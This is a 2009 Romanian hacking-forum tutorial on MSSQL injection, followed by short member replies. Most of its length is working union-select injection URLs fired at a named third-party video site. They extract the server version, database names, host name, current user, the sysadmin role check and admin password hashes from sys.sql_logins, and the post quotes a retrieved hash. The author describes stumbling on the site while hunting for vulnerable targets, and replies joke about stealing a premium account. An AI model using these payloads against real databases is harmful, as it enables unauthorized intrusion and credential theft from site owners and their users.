----[ MSSQL Injection ]----

June 8, 2009

----------------------------------[ MSSQL INJECTION ]----------------------------------

MSSQL nu este la fel de folosit ca MySQL, din aceasta cauza nu prea multi stiu sa faca MSSQL Injection.

Pe cand cautam un SQL intr-un site de gay, am dat din gresela de unul vulnerabil la MSSQL Inj am zis sa fac un tutorial, ca poate o sa prinda bine la multi!

Puteti citi mai multe despre MSSQL aici:

http://en.wikipedia.org/wiki/Microsoft_SQL_Server

----------------------------------[ Numarul Coloanelor ]----------------------------------

Folosim ca si la MySQL order by *--

Numarul de coloane = 26
Coloana vizibila este = 9

----------------------------------[ Versiunea ]----------------------------------

Se afla la fel ca cel de la MySQL cu @@version, dar nu si cu version().

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

----------------------------------[ Baza/bazele de date ]----------------------------------

Puteti afla numele bazei de date principala cu db_name().

Daca vreti sa vedeti ce baze de date mai are folositi db_name(nr), unde nr va fi numarul bazei de date, de ex: nr=1,2,3 etc

Baza de date principala este selft:

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,db_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Total 6 baze de date:

db_name(1) = master
db_name(2) = tempdb
db_name(3) = model
db_name(4) = msdb
db_name(5) = id3conf
db_name(6) = selft

----------------------------------[ Numele Host-ului ]----------------------------------

Puteti sa aflati numele cu ajutorul lui host_name()

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,host_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

----------------------------------[ User-ul principal ]----------------------------------

Il putem afla usor inlocuind coloana vizibila cu user_name() sau user.

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,user_name(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

----------------------------------[ Cum verifici daca admin-ul are privilegi de SA ]----------------------------------

Este usor si aici, nu trebuie decat sa punem is_srvrolemember('sysadmin','sa')

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,is_srvrolemember('sysadmin','sa'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Daca va returna 1 inseamna ca admin-ul are privilegi de SA [system Administrator], in caz contrar va returna 0.

In caz ca nu merge cu is_srvrolemember('sysadmin','sa') inlocuiti sysadmin cu bulkadmin.

Mai multe despre SA puteti citi aici:

http://en.wikipedia.org/wiki/System_administrator

----------------------------------[ Cum sa vezi coloanele unui tabel ]----------------------------------

Sintaxa este

www.site.com/...?id=-1+union+all+select+*,name,*+from+syscolumns--

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+syscolumns--

Daca doriti sa vedeti coloanele unei anumite baze de date folositi sintaxa:

www.site.com/...?id=-1+union+all+select+*,master..syscolumns.name,*+from+master..syscolumns--

Inlocuiti name cu numele tabelului din care vreti sa aflati coloanele.

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,master..syscolumns.xtype,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+master..syscolumns--

----------------------------------[ Cum sa obtii Hash-ul Adminului ]----------------------------------

Sintaxa este simpla:

www.site.com/...?id=-1 union all select *,password_hash,* from master.sys.sql_logins--

Hash-urile in MSSQL 2000/2005 sunt cryptate in SHA1, care au 40 de charactere.

http://503.archive-gay.com/deta.htm?idvideo=-2077+union+all+select+1,2,3,4,5,6,7,8,password_hash,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+master.sys.sql_logins--

Din cate vedeti nu apare, asa ca ne uitam in sursa.

Si vedem 1na1nb1ne1nf1ng1nh1va1vb1lalb1og1oh1cz1 [ care are 40 charactere = SHA1 ]

----------------------------------[ Cele mai intalnite baze de date ]----------------------------------

Aceste baze de date sunt cele mai des intalnite:

northwind
model
msdb
pubs
tempdb

Cam atat deocamdata, imi e lene sa mai continui, poate o sa mai adaug si alte lucruri altadata.

Writted by TinKode @ Insecurity.ro

Edited October 6, 2009 by Praetorian

June 9, 2009

bv bai Romeo

M4T3! · July 26, 2009

O intrebare: De unde stiu ca siteul este vulnerabil mssql? Imi dau seama din versiune, care este Microsoft sql server....?

October 6, 2009

Iti da-i seama din eroare.

ZeroCold · October 7, 2009

bun tutorialu...

Pe cand cautam un SQL intr-un site de gay....

Vroiai cont premium :D:D ?

UnD3rGr0uNd · October 7, 2009

Bunicel tut:)...a si 1-0 pt ZeroCold:))

dRuNNNk · October 11, 2009

bun tutorialu...
Vroiai cont premium :D:D ?

da de ce ai sa ne dai tu? XD

bucifala · October 24, 2009

si pana la urma ce face musca asta? :S

Nytro · October 24, 2009

si pana la urma ce face musca asta? :S

Ban permanent, spam. Parca ii mai dadusem o data sau de doua ori ban...

Sign In

----[ MSSQL Injection ]----

Recommended Posts

Guest Praetorian

Link to comment

Share on other sites

Guest Kabron

Link to comment

Share on other sites

M4T3!

Link to comment

Share on other sites

Guest Praetorian

Link to comment

Share on other sites

ZeroCold

Link to comment

Share on other sites

UnD3rGr0uNd

Link to comment

Share on other sites

dRuNNNk

Link to comment

Share on other sites

bucifala

Link to comment

Share on other sites

Nytro

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages